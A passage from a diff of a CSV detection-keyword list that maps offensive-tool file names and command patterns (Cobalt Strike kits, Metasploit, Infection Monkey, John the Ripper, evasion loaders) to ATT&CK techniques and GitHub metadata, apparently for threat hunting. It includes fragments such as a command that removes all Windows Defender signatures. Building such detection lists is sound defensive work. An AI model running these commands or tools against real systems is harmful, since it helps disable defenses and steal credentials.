beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*monoxgas/sRDI*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*moonD4rk/HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*MooseDojo*","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*morphHTA*","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","503","142","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z" "*mortar-main.zip*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*mousejack*","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","1203","255","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z" "*mouseshaker.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8639","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" +"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8640","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" "*Mozilla/5.0 (*-bit) dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" -"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*mozlz4-win32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*MpCmdRun.exe* -RemoveDefinitions -All*","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*mpgn/BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" -"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mr.un1k0d3r@gmail.com*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Mr-B0b/SpaceRunner*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*Mr-Cyb3rgh0st/Excel-Exploit*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" -"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" "*mremoteng_decrypt.py*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" -"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*Mr-Un1k0d3r*","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ms14-068.py -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ms14-068.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack 